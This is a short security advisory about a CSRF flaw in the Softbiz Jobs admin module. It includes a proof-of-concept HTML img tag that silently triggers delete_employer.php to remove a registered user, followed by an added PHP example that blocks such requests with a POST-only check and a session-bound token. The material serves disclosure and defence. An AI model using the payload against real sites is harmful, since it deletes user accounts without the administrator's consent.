=======================================================================
Softbiz Jobs CSRF Vulnerability
=======================================================================

by Pratul Agrawal

# Vulnerability found in: Admin module
# email Pratulag@yahoo.com
# company aksitservices
# Credit by Pratul Agrawal
# Download http://www.softbizscripts.com/
# Script softbizscripts

# Proof of concept

Script to delete a registered user through cross-site request forgery

...................................................................................................................
<html>
<body>
<img src=http://server/scripts/seojobs/admin/delete_employer.php?id=[USER ID] />
</body>
</html>
...................................................................................................................

After execution, refresh the page and you can see that the user with id=20 has been deleted automatically.

# If you have any questions, comments, or concerns, feel free to contact me.
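
The proof of concept works because the admin delete action runs on a plain GET request that the browser sends with the admin's session cookie attached. The following is an added example, not code from Softbiz Jobs or from the advisory author, showing the server-side check that rejects such a request; the function names and the 'csrf_token' and 'id' field names are assumptions.

```php
<?php
declare(strict_types=1);

// Added example (not Softbiz Jobs code). Function names and the
// 'csrf_token' / 'id' field names are assumptions made for illustration.

/** Return the per-session CSRF token, creating it on first use. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/**
 * Decide whether a delete request may proceed.
 * Returns the validated employer id, or null when the request is rejected.
 */
function authorize_delete(string $method, array $params, array $session): ?int
{
    // 1. State-changing actions must not be reachable via GET, which is
    //    what an <img src=...> tag on a third-party page issues.
    if (strtoupper($method) !== 'POST') {
        return null;
    }
    // 2. The request must carry the secret token bound to the admin's session.
    $expected = $session['csrf_token'] ?? '';
    $supplied = $params['csrf_token'] ?? '';
    if (!is_string($expected) || !is_string($supplied)
        || $expected === '' || !hash_equals($expected, $supplied)) {
        return null;
    }
    // 3. Validate the id before it reaches the delete query.
    $id = filter_var($params['id'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Constructed requests, run from the CLI (php example.php).
$session = [];
$token = csrf_token($session);
var_dump(authorize_delete('GET', ['id' => '20'], $session));   // forged image load
var_dump(authorize_delete('POST', ['id' => '20'], $session));  // forged form without token
var_dump(authorize_delete('POST', ['id' => '20', 'csrf_token' => $token], $session)); // admin's own form
```

In a real handler the call would be authorize_delete($_SERVER['REQUEST_METHOD'], $_POST, $_SESSION) after session_start(), with the token from csrf_token($_SESSION) emitted as a hidden field in the admin's delete form.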